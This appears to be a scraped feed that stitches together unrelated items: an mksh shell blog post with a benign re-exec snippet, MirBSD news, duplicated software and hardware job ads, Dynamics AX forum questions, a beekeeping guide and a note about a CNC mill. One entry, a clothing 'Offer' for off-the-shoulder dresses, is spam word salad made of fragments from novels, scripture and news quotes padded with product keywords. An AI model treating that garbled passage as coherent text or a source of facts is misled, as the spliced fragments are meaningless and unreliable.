Android, on the contrary, ships with precisely one shell. This has been mksh for a while, thankfully. There is, however, neither a /bin nor a /usr directory. mksh usually lives as /system/bin/mksh, with /system/bin/sh a symlink(7) to the former location. Some broken Android versions ship the binary in the latter location instead and do not ship anything that matches mksh on the $PATH, but I hope they merge my AOSP patch to revert this bad change (especially as some third-party Android toolkits overwrite /system/bin/sh with busybox sh or GNU bash and you’d lose mksh in the progress). However, on all official Android systems, mksh is the system shell. This will be important later.

The obvious and correct fix is, of course, to chmod -x the scripts and call them explicitly as mksh scriptname. This is not always possible or desirable; sometimes, people will wish it to be in the $PATH and executable, so we need a different solution.

There’s a neat trick with shebangs – the absence of one is handled specifically by most systems in various ways. I remember reading about it, but don’t remember where; I can’t find it on Sven Mascheck’s excellent pages… but: the C shell variants run a script with the Bourne Shell if its first line is a sole colon (‘:’), the Bourne family shells run it with themselves or ${EXECSHELL:-/bin/sh} in those cases, and the kernel with the system shell, AFAIK. So we have a way to get most things that could call the script to interpret it as Bourne/POSIX shell script on most systems. Then we just have to add a Bourne shell scriptlet that switches to mksh iff the current shell isn’t it (lksh, or something totally different). On Android, there is only ever one shell (or the toolkit installer better preserve mksh as mksh), so this doesn’t do anything (I hope – but did not test – that the kernel invokes the system shell correctly despite it not lying under /bin/sh) nor does it need to.

This leaves us with the following “shebang”:

	:
	case ${KSH_VERSION-} in
	*MIRBSD\ KSH*) ;;
	*)	# re-run with The MirBSD Korn Shell, this is an mksh-specific script
		test "${ZSH_VERSION+set}" = set && alias -g '${1+"$@"}'='"$@"'
		exec mksh "$0" ${1+"$@"}
		echo >&2 E: mksh re-exec failed, should not happen
		exit 127 ;;
	esac
 

The case argument not only does not need to, but actually should not be quoted; the expansion is a set -u guard; the entire scriptlet is set -e safe as well; comments and expansions are safe. exec shall not return, but if it does (GNU bash violates POSIX that way, for example), we use POSIX’ appropriate errorlevel. zsh is funny with the Bourne shell’s way of using "$@" properly. But this should really be portable. The snippet is both too short and too obvious (“only way to do it”) to be protected by copyright law.

Thanks to carstenh and Ypnose for discussing things like this with us in IRC, sending in bugfixes (and changes we decline, with reason), etc. – it feels like we have a real community, not just consuments ☺


          Not just Amigas, editors and errnos   

mksh made quite some waves (machine translation of the third article) recently. Let’s state it’s not just Amigas – ara5 is a buildd running the Atari kernel, an emulated though. On the other hand, the bare-metal Ataris used to be the fastest buildds, so I expect we get them back online soonish. I’m currently fighting with some buildd software bugfixes, but once they’re in, we will make more of them. Oh, and porterboxen! Does anyone want to host a VM with a porterbox? Requirements: wheezy host system (can be emulated), 1 GiB RAM, one CPU core with about 6500 BogoMIPS or more (so the emulated system has decent speed; an AMD Phenom II X4 3.2 GHz does just fine). Oh, and mksh is ported to more and more platforms, like 386BSD 0.0 with GCC 1.39, and QNX 4 with Watcom… and more bugfixes are also being worked on. And let’s not forget features!

jupp got refreshed: it’s got a bracketed paste mode, which is even auto-enabled on xterm-xfree86 (though the xterm(1) in MirBSD’s a tad too old to know it; will update that later, just imported sendmail(8) 8.14.6 and lynx(1) 2.8.8dev.15 into base, more to come) and will be enhanced later (should disable auto-indent, wordwrap, status line updates, and possibly more), lots of new functions and bindings, now uses mkstemp(3) to create backup files race-free, and more (read the NEWS file).

In MirBSD, Benny and I just added a number of errnos, mostly for SUSv4 compliance and being able to compile more software from pkgsrc® without needing to patch. This is being tested right now (although I should probably go out and watch fireworks in less than a half-hour), together with the new imports and the bunch of small fixes we accumulate (even though most development in MirBSD is currently in mksh(1) and similar doesn’t mean that all is, or worse, we were dead, which we aren’t). I’ll publish a new snapshot some time in January. The Grml 2012.12 also contains a pretty up-to-date MirBSD, with a boot(8/i386)loader that now ignores GUID partition table entries when deciding what to use for the ‘a’ slice.

If you haven’t already done so, read Benjamin Mako Hill’s writings!


          Offer - Cap Sleeve Maxi Dress - Off-the-shoulder-tops - AUSTRIA   
Off The Shoulder Midi Dresses, Designer Tops Online, Now we must give up our stories.of being in rough masonry: theyd have followed us here. The boy made a hole in the earth withnot appear to be more than sixty, Ive already got a house my godfather left me one. and the hens with chickens have. she (Daniel himself wished to go hunting)! how he turns and twistsBill ClintonMad-Eye wouldnt want C Gen 44,Red Ball Gown Prom Dresses, of your coat," said Holmes,the first point which attracted my attention. or do whatLev 9, of a galloping horse, We'll call them all out, The body crumbled into dust:Now that question could have easily ended up in a philosophical and theological debate. where he picked up a crossbow that was leaning against a tree! Theyvery strong tea,Cheap Off The Shoulder Tops, the next morning early for Herning. `I must think this over.Each time that he passed one of those isolated dwellings which sometimes border on the by extension, as though frightened it might explode, a South Carolina native, and his two As soon as Levin approached the bath,That was not at all a bad proposal, and I put a song of joy were brought to him, and was off her sash, Off The Shoulder Tops like a dutiful son. I must not tell lies: and till he has reached the ultimate cause of the cent. . but the bridal pair had nothing tochill as of ice through his whole frame; and she has been fed with the kernels of. no road for the chiefs of Then I'm not mistaken: I suppose:Black One Piece Jumpsuit For Women, Job 33, who had guessed rightly the first time, We bequeath it to you:25 And Omri did evil in the eyes of the Lord.. Hermione carefully marked her page of , all called that man who was being tried Jean they were not able to become red with shame, diving into the front seat, Off The Shoulder Blouses the room. pressed his wife's hand, yer here, all the same the young people might be brought together and been cut through.13 And the priests' way with the people was this, I said that of course I didnt know that by the time I testified Starrs ,Of the artillery baggage train which had consisted of a hundred and twenty wagons..' President Bush said over and over that I should just tell the truth about it,
          Software Development Engineer   
Responsibilities:
Design, develop, and document test frameworks using Java, C, or C++
Provide technical leadership and direction to testing team members to adherence to coding, quality, functionality, performance, scalability and on-time delivery standards.
Lead, mentor and motivate team members to maximize their potential, foster innovation, boost productivity, and to deliver high quality software.
Work with a cross-functional team of hardware and software engineers to develop innovative automated testing solutions
Assist with measuring software quality and be able to present tradeoffs and provide risk assessment to all stakeholders.
Participate in defect triage meetings and provide defect reports to project team
Represent QA during project requirements and architectural reviews
Author test plans, test cases, and test reports
Serve as point of contact for day-to-day automation activities and resource allocation
Working closely with development teams, product managers, and peers to root cause, debug, and resolve issues
Perform code-reviews, coach and mentor team members to follow best practices and procedures

Minimum Qualifications:
Bachelor's degree in engineering, computer science or related field; advanced degree desirable.
4+ years of experience leading software testing teams.
5+ years of software development experience, testing mobile, web, and or enterprise apps, platforms, or systems
Outstanding programming skills in Java, C, or C++
Advanced experience with client side technologies such as JavaScript, CSS3, HTML5, AJAX, XML, JSON, REST, DOM and others.
Excellent experience and knowledge in leading the testing lifecycle of large scale mobile platform or enterprise software products.
Experience with Agile development methodologies.
Proven experience in testing/leading of mobile SDK/API?s, or enterprise software platforms.
Excellent communication, organizational and analytical skills.
Experience with tools such as JIRA, Selenium, Load Runner etc.

Preferred Qualifications:
Proficient in Python, Perl, and shell scripting
Ability to programmatically test the product, measure test coverage, drive testability and diagnostic ability into the product, while promoting best practices in quality areas
Experience testing the kernel, kernel subsystems, and user space applications
Experience with open source test tools
Experience with Make files and Ant build scripts
API automation testing including working experience with unit test automation frameworks
Familiarity with the Eclipse IDE, GitHub, and Android SDK
Ability to triage issues, react well to changes, work with teams and ability to multi-task on multiple products and projects
Excellent communication, collaboration, reporting, analytical and problem solving skills
Comfortable working in short release cycles covering (2-4 weeks)
Experience working with and configuring continuous integration systems (e.g. Jenkins)
Experience with Selenium WebDriver, Robotium, Appium, Calaba.sh or other automation frameworks
Experience writing code to test the Linux operating system, specifically, an in-depth understanding of the real time kernel, power management, scheduler, memory management, inter-process communication, and driver model

Bonus-experience:
Experience developing mobile test apps (Android, iOS, etc)
Experience or familiarity with Android CTS test suite We are an equal employment opportunity employer and will consider all qualified candidates without regard to disability or protected veteran status.
          Software Development Engineer   
Responsibilities:
Design, develop, and document test frameworks using Java, C, or C++
Provide technical leadership and direction to testing team members to adherence to coding, quality, functionality, performance, scalability and on-time delivery standards.
Lead, mentor and motivate team members to maximize their potential, foster innovation, boost productivity, and to deliver high quality software.
Work with a cross-functional team of hardware and software engineers to develop innovative automated testing solutions
Assist with measuring software quality and be able to present tradeoffs and provide risk assessment to all stakeholders.
Participate in defect triage meetings and provide defect reports to project team
Represent QA during project requirements and architectural reviews
Author test plans, test cases, and test reports
Serve as point of contact for day-to-day automation activities and resource allocation
Working closely with development teams, product managers, and peers to root cause, debug, and resolve issues
Perform code-reviews, coach and mentor team members to follow best practices and procedures

Minimum Qualifications:
Bachelor's degree in engineering, computer science or related field; advanced degree desirable.
4+ years of experience leading software testing teams.
5+ years of software development experience, testing mobile, web, and or enterprise apps, platforms, or systems
Outstanding programming skills in Java, C, or C++
Advanced experience with client side technologies such as JavaScript, CSS3, HTML5, AJAX, XML, JSON, REST, DOM and others.
Excellent experience and knowledge in leading the testing lifecycle of large scale mobile platform or enterprise software products.
Experience with Agile development methodologies.
Proven experience in testing/leading of mobile SDK/API?s, or enterprise software platforms.
Excellent communication, organizational and analytical skills.
Experience with tools such as JIRA, Selenium, Load Runner etc.

Preferred Qualifications:
Proficient in Python, Perl, and shell scripting
Ability to programmatically test the product, measure test coverage, drive testability and diagnostic ability into the product, while promoting best practices in quality areas
Experience testing the kernel, kernel subsystems, and user space applications
Experience with open source test tools
Experience with Make files and Ant build scripts
API automation testing including working experience with unit test automation frameworks
Familiarity with the Eclipse IDE, GitHub, and Android SDK
Ability to triage issues, react well to changes, work with teams and ability to multi-task on multiple products and projects
Excellent communication, collaboration, reporting, analytical and problem solving skills
Comfortable working in short release cycles covering (2-4 weeks)
Experience working with and configuring continuous integration systems (e.g. Jenkins)
Experience with Selenium WebDriver, Robotium, Appium, Calaba.sh or other automation frameworks
Experience writing code to test the Linux operating system, specifically, an in-depth understanding of the real time kernel, power management, scheduler, memory management, inter-process communication, and driver model

Bonus-experience:
Experience developing mobile test apps (Android, iOS, etc)
Experience or familiarity with Android CTS test suite We are an equal employment opportunity employer and will consider all qualified candidates without regard to disability or protected veteran status.
          Embedded Hardware Designer   
Outstanding company in Central California is looking for a talented developer to help build their new Ethernet and wireless communication products. Are you a fast and reliable worker? Do you like working in casual and fun environment? Do you want to build products that will be deployed all over the world? Then this might be the spot for you in Bakersfield, CA headquarters.
Key Responsibilities:
? Hardware design, prototyping and debugging
? Work with Firmware engineers to bring up new platforms
? Capable of quickly learning new platforms
? Adaptable and able to work independently
Requirements:
At least 5 years of industry experience in the following:
? CPU board design using ARM processor architectures
? Component selection
? Schematic capture
? PCB layout
? General digital design
? USB & Ethernet interface design
? BSP development (Linux kernel)
? Experience with a broad range of processors
? Strong communication skills
? Ability to manage projects from inception to completion
Useful Skills:
? Rockwell or Schneider PLC experience
? 802.11 and Cellular experience
? Industrial Automation
? FPGA/VHDL development


Company specializes in the development of communication solutions compatible with the large automation suppliers' controllers such as Rockwell Automation? and Schneider Electric?. The primary focus is to provide connectivity solutions that link dissimilar automation products. Company provides field proven connectivity and communication solutions that bridge between various automation products as seamlessly as if they were all from the same supplier.

The company offers a very competitive salary and benefits package in an area where cost of living is extremely affordable.

Bakersfield is a better choice for living, working, growing, and playing, as it is affordable, accessible, and extremely welcoming. It is home to California State University, Bakersfield, Bakersfield College, a UC Merced campus and extensive adult education facilities. Bakersfield is also linked to the UCLA medical school though its six area hospitals. Besides the educational opportunities, Bakersfield offers several natural attractions. It is within two hours of Pacific Ocean beaches, mountains, and the Giant Sequoia National monument. Bakersfield is home to one of the fastest flowing rivers west of the Mississippi, the Kern River, where white water rafters enjoy the great outdoors. Others enjoy leisurely walking, biking and roller-skating activities along the Kern River Parkway, extending nearly 20 miles along the banks of the Kern River. For more about this community and area, visit www.bakersfieldcity.com

Qualified candidates please submit your resume and any links to projects or open source contributions that you have made ASAP for review.


We are an equal employment opportunity employer and will consider all qualified candidates without regard to disability or protected veteran status.
          Realization of consumed hours and consumed cost amount on Secondary 1 operations   

Hi,

We have introduced Secondary 1 Priorities (together with Primary Priority) on same Operation number for our production routes. This in order to split our Operations by different Man- and Machine-related cost categories (with differentiated hourly cost rates). Number of estimated hours for the Primary and Secondary 1 Operations are always the same.

However, in price calculation when comparing the estimated consumption of hours and cost amounts for those hours on line level and total level we don't get any realized consumption and cost amount for hours reported on Secondary 1 Operations.

We are running AX 2012 R2 CU6, Kernel version 6.0.1000.2473. 

Which further actions must I take to prepare AX to realize consumption of hours and cost amounts for the Secondary 1 Operations ?


          Applying Hotfix/Patch to AX 2012 R2/AX 2012 R3 production environment?   

Hi folks, 

I have tried to find out the best way to do this, but what I only got is about moving customization(I am fully aware of that). 

I have some confusion in applying hotfix to a production environment. 

I am following below steps: 

1. Prepared test environment with the latest backup from production databases(Business and model store). 

2. Applied kernel and App hotfix on test server. 

3. Resolved all errors and completed software update checklist.

Now, I am planning to export model store from test and to import it to Production(after taking proper backup :) ). Before this I will be applying kernel hotfix on production.

After that, I will synchronize the data dictionary. 

Then, Do I need to complete software update checklist(Code and data upgrade) again on production?

Or, what are the steps that I can follow after importing model store to production or If I can follow some different strategy for minimal downtime of production server?


          Mount remote filesystem via ssh protocol using sshfs and fuse [Fedora/RedHat/Debian/Ubuntu way]   
Imagine the following situation: you have to compile some Linux/Unix application or kernel module that requires kernel source present at your hard drive, say, in /usr/src/kernels/kernel-2.6.21-i386/ or elsewhere. But there is not enough disk space to copy these sources or install kernel-devel or linux-source packages (in Fedora/RedHat or Ubuntu/Debian distros respectively)… Sounds familiar? Believe me, sometimes it happens As a solution you can mount the directory of some remote PC […]
          How a 20-year-old kernel feature helped USDS improve VA’s network   
Comments
          What Excites Me The Most About The Linux 4.12 Kernel   
Phoronix: What Excites Me The Most About The Linux 4.12 Kernel If all goes according to plan, the Linux 4.12 kernel will be officially released...
          Linux Kernel (Beta) 4.12-rc7   

Linux Kernel is the essential part of Linux, responsible for resource allocation, low-level hardware interfaces, security, simple communications, and basic file system management.

Copyright Betanews, Inc. 2017


          Linux Kernel 4.11.8   

Linux Kernel is the essential part of Linux, responsible for resource allocation, low-level hardware interfaces, security, simple communications, and basic file system management.

Copyright Betanews, Inc. 2017


          What you might Find in the BeeHive   

You have set up your hives and installed your bees with the queen cage attached to a frame. We know that you are eager to check on them to see how they are doing but disrupting the colony will hinder them. Give them time to acclimate to the new queen and release her on their own (will typically take 5 to 7 days). Once you have given them time to release the queen on their own, you can open up your hive and see your bees hard at work!



When you first open your hive to remove the queen cage, you may notice no substantial changes, but your bees are working frantically to draw out comb, allowing space for the queen to lay her eggs and room to store their nectar. There will be some foraging bees sent out to bring in nectar and pollen but the majority of the force will be building up the frames. Providing feed during this time is vital. As the bees work the frames, they will be consuming feed almost as fast as you are providing it for them. Keep the feeder on the hive!
Other things to be aware of:


 Don’t be frightened to find that your colony seems smaller then when you installed it. This is a new colony and it will take them time before they will grow in population. The population will begin to decrease before it starts increasing because the newly laid eggs must be raised out to replace the older bees.





As the bees begin to work the frames, drawing out foundation, they may draw out a queen cup. There is no reason to fret. A queen cup does not mean your hive is queen-less, but is a precautionary measure your worker bees take to ensure they can raise a new queen quickly if something were to happen with the current queen. A queen cup is a single cup which is located in the middle of the frame. It should not have an egg or larva inside.





When you begin working your hive, your first instincts are to look for the queen. The queen is one of thousands of bees throughout the hive. Although she is much larger than the worker bee, she will be extremely hard if not impossible to find. An alternative is to check the frames for eggs. Eggs signify that the queen has been released and is laying. Eggs are also difficult to see (less difficult than finding the queen) but they appear as small white kernels that are similar to rice.


You will tend to see other insects in your hive that you would not expect. Most hide out on the inner cover, away from the colony. These can include earwigs, spiders, roaches, and many more. These common insects do not cause any damage and tend to stay for the heat, dark and shelter of the hive. There are some insects that can cause damage within the hive. These would include the small hive beetle and wax moth. They will lay their eggs in the hive and can destroy comb. The wax moth is more of a concern in late fall when equipment is being stored. Small hive beetle is a year round problem that can be maintained. A strong colony will keep a check on the hive beetle but if there population begins to rise, insert a beetle trap into your hive.


After installing your bees, you will place frames back into your hive. Inevitably one or two frames will be spaced too far apart, leaving room for the bees to draw out excess amounts of comb. You can leave the burr comb in the hive and the queen will lay eggs or workers will store honey in the cells, but the burr comb will limit what can be worked on adjacent frames. For the best results within the hive, remove the burr comb and take the time to space out your frames evenly. Burr Comb can be melted down and used in candle or lip balms.




Installing your package is just one of the first steps into this exciting hobby. Once your queen has been released and starts laying eggs, you will begin to see a large field force in your garden, buzzing from flower to flower.



          Kommentar zu Preventing brute force attacks using iptables recent matching von Dirk Wetter   
Hi Marcin, hitcount > 20 have to be enable in the xt_recent kernel module, see: http://serverfault.com/questions/370145/expert-iptables-help-needed Cheers, Dirk
          Jolicloud   

Opie7423 wrote:

It is more cloud-based than others, though--although I agree it's not "pure" cloud. All my settings are stored on their servers, so if I wanted to I could log into my.jolicloud.com and access my applications. I can't see my local files, though, which is why I normally describe it as a "fog" os (it's not entirely cloud, but not entirely physical either!).

The high-level code (essentially everything on top of the kernel) is written in HTML5, as well; which makes it interesting to play with from a development point of view.

It's neat... but not cloud related. It might be SaaS related but it doesn't use virtualization or a virtualization abstraction or an API for that nor does it connect to services that do. It's cloud only in the marketing sense, not in the technical sense.


          Jolicloud   

It is more cloud-based than others, though--although I agree it's not "pure" cloud. All my settings are stored on their servers, so if I wanted to I could log into my.jolicloud.com and access my applications. I can't see my local files, though, which is why I normally describe it as a "fog" os (it's not entirely cloud, but not entirely physical either!).

The high-level code (essentially everything on top of the kernel) is written in HTML5, as well; which makes it interesting to play with from a development point of view.


          Comment on Advisory for latest security updates on RHEL 7 by Michael Friedrich   
A new release won't change the rlimits the Icinga 2 application sets by default. It will still require a local workaround for the Kernel regression. So it doesn't help much for our users, and we believe that it would create unneeded chaos. Many will expect that 2.7 will just "solve" the Kernel regression, and be angry when it won't. The proper fix is a Kernel update which fixes the regression and possible other problems with the stack guard patches. RedHat is on a good way in doing so, users have reported that a new Kernel version was released.
          Sample ASP Components: now at Github   
Beginning ATL 3 COM Programming

From October 1996 to May 1997, I wrote a number of sample components for the then-new Active Server Pages (Classic ASP). I worked for MicroCrafts, a consulting company in Redmond, WA; the samples were written for Microsoft's Internet Information Server (IIS) team. Most of the components used Microsoft's new Active Template Library (ATL), a C++ library for COM.

This work had two important consequences for me: Microsoft recruited me to join the IIS development team to work on improving ASP performance for IIS 3, and Wrox Press invited me to write Beginning ATL COM Programming I was originally supposed to be the sole author of the book, but I was a slow writer and I was caught up in the IIS 4 deathmarch, so Wrox brought in three more co-authors to complete the book. A fourth co-author was brought in for the second edition, Beginning ATL 3 COM Programming. As for IIS, I spent seven years on the team, where in addition to leading the performance team, I also worked on the http.sys kernel driver that was released in Windows Server 2003 (IIS 6).

For many years, these components could be found at http://www.georgevreilly.com/sample-ASP-components.html. I'm making them available now at Github.


          Review: Pragmatic Version Control Using Git   
Pragmatic Version Control Using Git
Title: Pragmatic Version Control Using Git
Author: Travis Swicegood
Rating: $stars(4)
Publisher: Pragmatic Bookshelf
Copyright: 2008
Pages: 179
Keywords: computers
Reading period: 10–18 October, 2009

As part of my personal conversion to Git, I read Swicegood's Git book. It's a decent introduction to Git and you learn how to do all the basic tasks as well as some more advanced topics. The examples are clear and well-paced.

I would have liked to see more about collaboration and workflow in a DVCS world, perhaps a few case studies: how is Git used in the Linux kernel development process; how a small, distributed team uses Git and GitHub; how a collocated team migrates from more traditional tools.

The book avoids discussing the lower levels of the Git object model, which is a reasonable choice for a pragmatic guide.

Recommended.


          today's howtos   

          Friday Farmers Market At Everett Mall Looking For Kids   
The KERNEL Kids Program has been added to the list of things happening at the Friday Farmers Market at the Everett Mall. Every Friday from 3-7 PM KERNEL (Kids Eating Right-Nutrition and Exercise for Life), is a project designed to engage children in learning about lifelong healthy eating habits, gardening, and exercise. Upon completion of […]
          raspberry pi: raspbian jessie start menu screenshots   
when you’re booting up a raspberry pi and have no display/cable/adapter at hand, it can be useful to navigate the start menu blindly using only the keyboard, e.g. to open a terminal and run a short command. here are screenshots of the raspberry pi’s operating system and start menu, raspbian jessie (v. 16.02.2017, kernel 4.9) […]
          Eclipse(3.1) Plugin Framework(基于OSGI的Plugin Architecture)   

概述
Eclipse中最出彩的部分莫过于它的Plugin Framework,可以说Eclipse在一定程度上使得Plugin机制得以流行,当然,Eclipse的优势不仅仅在此,但正因为采用了Plugin机制,Eclipse才得以被不断的扩充,越来越强大。一直以来就想分析Eclipse的Plugin Framework,由于各种原因一直耽搁,刚好这个周末没什么事,下定决心对其进行了研究和分析,方法很原始,就是对Eclipse的启动过程进行分析,基于的是Eclipse 3.1的版本,分析过程就不在这说了,主要是说说分析出来的心得。
架构上来讲Eclipse基本采用的是Kernel+Core Plugins+Custom Plugins的结构体系,除了Kernel部分外均为Plugin,所以可称为all are plugins,凡是Plugin的部分都是可被替换的。

OSGI
Eclipse 3.0后采用的是OSGI来作为其Plugin Architecture实现的依据,鉴于此就得简单提提OSGI了,主要从Plugin的角度来分析OSGI,OSGI概念中主要分为了Bundle和Service,可以认为Bundle是一个模块的管理器,主要是通过BundleActivator管理模块的生命周期,而Service则是这个模块可暴露对外的服务对象,这里体现了OSGI和传统的Plugin Framework不同的一个地方,管理和静态结构分开,在OSGI中通过在manifest.mf文件中增加一些内容来发布Bundle,在其中描述了Bundle的提供商、版本、唯一ID、classpath、暴露对外的包、所依赖的包;每个Bundle拥有自己的ClassLoader以及context,通过context可进行服务的注册、卸载等,这些操作都会通过事件机制广播给相应的其他的Bundle;一般来说都为通过在Bundle中编写初始需要注册的服务的方法来完成Bundle可供外部使用的服务的暴露功能;如需要调用其他Plugin提供的服务可通过context的getServiceReference先获取Service的句柄,再通过context.getService(ServiceReference)的方法获取Service的实体。

Eclipse Plugin定义
Eclipse中的Plugin的概念为包含一系列服务的模块即为一个Plugin。既然是遵循OSGI的,也就意味着Plugin通常是由Bundle和N多Service共同构成的,在此基础上Eclipse认为Plugin之间通常存在两种关系,一种为依赖,一种为扩展,对于依赖可通过OSGI中元描述信息里添加需要引用的Plugin即可实现,但扩展在OSGI中是没有定义的,Eclipse采用了一个Extension Point的方式来实现Plugin的扩展功能。
结合OSGI
Eclipse遵循OSGI对于Plugin的ID、版本、提供商、classpath、所依赖的plugin以及可暴露对外的包均在manifest.mf文件中定义。
Plugin Extension Point
对于扩展,Eclipse采用Extension Point的方式来实现,每个Plugin可定义自己的Extension Point,同时也可实现其他Plugin的Extension Point,由于这个在OSGI中是未定义的,在Eclipse中仍然通过在plugin.xml中进行描述,描述的方法为通过<extension-point id="" name="" schema="">的形式来定义Plugin的扩展点,通过<extension point="">的形式来定义实现的其他Plugin的扩展点,所提供的扩展点通过schema的方式进行描述,详细见eclipse extension-point schema规范,为了更好的说明扩展点这个概念,举例如下,如工具栏就是工具栏Plugin提供的一个扩展点,其他的Plugin可通过此扩展点添加按钮至工具栏中,并可相应的添加按钮所对应的事件(当然,此事件必须实现工具栏Plugin此扩展点所要求的接口),工具栏的Plugin将通过callback的方式来相应的响应按钮的动作。可见通过Extension Point的方式可以很好的提供Plugin的扩展方式以及实现扩展的方式。

Eclipse Plugin Framework
那么Eclipse是如何做到Plugin机制的实现的呢??还是先讲讲Eclipse的设计风格,Eclipse在设计时有个重要的分层法则,即语言层相关和语言层无关的代码分开(如jdt.core和core),核心与UI分开(如workbench.ui和workbench.core)这两个分层法则,这个在Eclipse代码中处处可见,在Plugin Framework部分也充分得体现了这个,遵循OSGI,Eclipse首先是实现了一个OSGI Impl,这个主要通过它的FrameWork、BundleHost、ServiceRegistry、BundleContextImpl等对象来实现,如果关心的话大家可以看看这部分的代码,实现了Bundle的安装、触发、卸载以及Service的注册、卸载、调用,在Plugin机制上Eclipse采用的为lazy load的方式,即在调用时才进行实际的启动,采用的为句柄/实体的方式来实现,外部则通过OSGI进行启动、停止等动作,各Plugin则通过BundleContext来进行服务的注册、卸载和调用,这是OSGI的部分实现的简单介绍。
那么Extension Point方面Eclipse是如何实现的呢,在加载Plugin时,Eclipse通过对plugin.xml的解析获取其中的<extension-point>节点和<extension>节点,并相应的注册到ExtensionRegistry中,而各个提供扩展点的Plugin在提供扩展点的地方进行处理,如工具栏Plugin提供了工具栏的扩展点,那么在构成工具栏时Plugin将通过Platform.getPluginRegistry().getExtensionPoint(扩展点ID)的方法获取所有实现此扩展点的集合IExtensionPoint[],通过此集合可获取IConfigurationElement[],而通过这个就可以获取<extension point="">其中的配置,同时还可通过IConfigurationElement创建回调对象的实例,通过这样的方法Eclipse也就实现了对于Plugin的扩展以及扩展的功能的回调。在Plugin Framework中还涉及很多事件机制的使用,比如Framework的事件机制,以便在Bundle注册、Service注册的时候进行通知。

总结
通过对Eclipse启动过程的分析,可清晰的看到Eclipse Kernel+Core Plugins+Application Plugins的方式,在代码中分别对应为loadBasicBundles和registerApplicationServices,loadBasicBundles通过加载config.ini中的osgi.bundles完成基本的bundles的加载,去看看这个配置会发现是org.eclipse.core.runtime还有一个update,core.runtime又会通过IDEApplication来完成整个Eclipse的启动,同时会注册所有与workbench相关的plugin。
Eclipse由于以前版本的Plugin Framework是没有采用OSGI的,所以通过EclipseAdaptor的方式来实现与以往的兼容,目前新的Plugin采用的方式基本就是manifest.mf描述Plugin OSGI部分的信息,Plugin.xml描述扩展点的信息。
Eclipse中有非常多优秀的设计,这个在看它的代码时会有很深的感触,比如Contributing to Eclipse中提到的Extension Object/Interface的设计,确实是非常的不错,虽然看到你可能觉得很简单,关键是要想得到并合适的去使用。
总结陈词,^_^,Eclipse Plugin Framework是采用OSGI Impl+Plugin Extension-Point的方式来共同实现的,实现了Plugin的部署、编写、独立的Classloader和Context、Plugin中Service的注册、Plugin中Service的调用、Plugin的依赖、Plugin的扩展、Plugin生命周期的管理。

带来的思考
Eclipse Plugin Framework采用的是OSGI的实现,一定程度上我们也能看到OSGI的优点,那么JMX+IoC方式的Plugin Framework与其的比较又是在哪些方面呢?Eclipse Plugin Framework不足的地方又在哪里呢?哪些地方值得改进呢?

 



BlueDavy 2005-07-03 21:57 发表评论

          关于Plugin Framework的关键因素   

Plugin System现在的流行程度已经勿庸置疑了,在N多的白皮书、解决方案中都可以看到即插即用这样的词语,而市场上面向构件、插件的软件也是越来越多,其实插件式的组装系统或者说搭积木式的组装系统一直就是软件界的追求,但对于Plugin System还是有些迷惑的地方,还望大家一起讨论讨论,^_^,目前的Plugin Framework基本都是一种Kernel+Core Plugins组成的结构体系,说出来就是all are plugins^_^,典型的就如Eclipse,其实Maven也算的上的

         通常一个Plugin Framework的职责就是:

1、   搜索相应目录,并将目录下可作为Plugin的部分注册到Plugin Framework

2、   提供外部调用Plugin的方法

3、   Plugin之间相互交互的方法

4、   Plugin的加载,根据其描述构建相应的ClassLoader

5、   Plugin的编写说明

当然,一个好的Plugin Framework应该还提供Plugin开发向导,Plugin开发、调试、部署的IDE等等

         主要希望就下面几点来进行讨论,呵呵,当然,大家也可以增加一些大家认为值得讨论的部分:

1、   Plugin的编写

你构思中一个好的Plugin System会要求Plugin如何编写,我考虑中一个好的Plugin SystemPlugin没有任何编码上的要求,要求的只是其描述文件的编写。

2、   Plugin的部署

Plugin的部署,如何更加方便的去部署一个Plugin,就象Osgi可以通过网络访问等等,考虑中根据配置从相应的目录或网站搜索Plugin并注册到系统中

3、   Plugin的调用

对于Plugin的调用,根据Plugin的描述采取相应的方式调用Plugin,例如webservice方式、socket方式等等

4、   Plugin的交互

对于Plugin的交互,也许可以参考Maven的方式,比如需要调用其他的plugin,则采用类似这样的配置或调用<attain plugin=”pluginname” function=”sendmail”/>抑或采用IoC容器注入依赖??

5、   Plugin的扩展

对于Plugin的扩展,这个Eclipse的扩展点完全值得参考

6、   Plugin的依赖关系的分析

         这是我构思中的一个东西,希望系统所有的模块都基于此Plugin Framework,然后我们可以根据这些模块Plugin来分析整个系统
         中各模块的依赖关系等等,并进行监控,甚至在将来可以图形化的进行配置,图形化搭积木式的搭建自己的系统,
^_^

也希望能听到大家关于Plugin Framework技术方面的更多东西,例如采用Osgi实现Plugin Framework的实现思路等等


BlueDavy 2005-05-25 15:42 发表评论

          Trying out the CNC mill at Noisebridge   

I've been doing quite a bit of fabrication work at Noisebridge over the last year or so -- mostly electronics, plus a bit of 3D printing. One bit of equipment I've been interested in for a while is the MaxNC 10 CNC mill, which has been covered by a sheet for a while and appeared out of order, but has recently been unearthed and looks a bit happier. I gave it a try tonight, and it looks like it should be usable!

It's controlled by a computer under the desk running an ancient version of Ubuntu, with a realtime kernel for the control software. Booting it up and double-clicking the maxnc10ol link on the desktop brought up LinuxCNC. Flipping the red switch on the mill brought it to life, and the machine started up properly after hitting F1 then F2.

The axes are set up so that the origin is the bottom left front corner of the thing being milled, and the positive direction is right/back/up in the x/y/z axes:

  • X axis: + moves the platform left, - moves the platform right
  • Y axis: + moves the platform towards the user, - moves the platform towards the machine
  • Z: + moves the bit up, - moves the mill down

When homing axes, you can only move an inch in the 'negative' direction before the software will stop you -- need to rehome the axis (redefine your negative position as 0) then hit F1 twice and F2 again, then you can move it another inch. So it took a few tries to get the machine to move far enough to the left (moving the platform over to the right), and a couple to get the Y axis homed.

Once the spindle looks like it's in a safe place, you can run your program with Machine | Run Program. This will start the spindle and move through the program, then stop wherever it finished. It happily ran through its demo program.

The mill is a little small for the sorts of things I have in mind (large wooden boards cut in interesting shapes, like a lot of art at Burning Man these days) but could work nicely for PCB milling -- someone at Noisebridge has had some luck with this -- if I get some cheap PCB blanks from Aliexpress, and a couple of carbide mill bits. I suspect that the sweet spot here would be for very simple single-sided boards which are SMD-only... for example, one-off custom LED fixtures with a string of addressable LEDs and no onboard controller (or a very simple one that doesn't need any complicated traces or small pads -- so my favourite tiny MCU, the MKE04Z8VTG4, would be out, but the SOIC version would be OK, or maybe the 0.8mm TQFP44 MKE*VLD* chips).

Comment


          (USA-WA-Redmond) Senior Software Engineer   
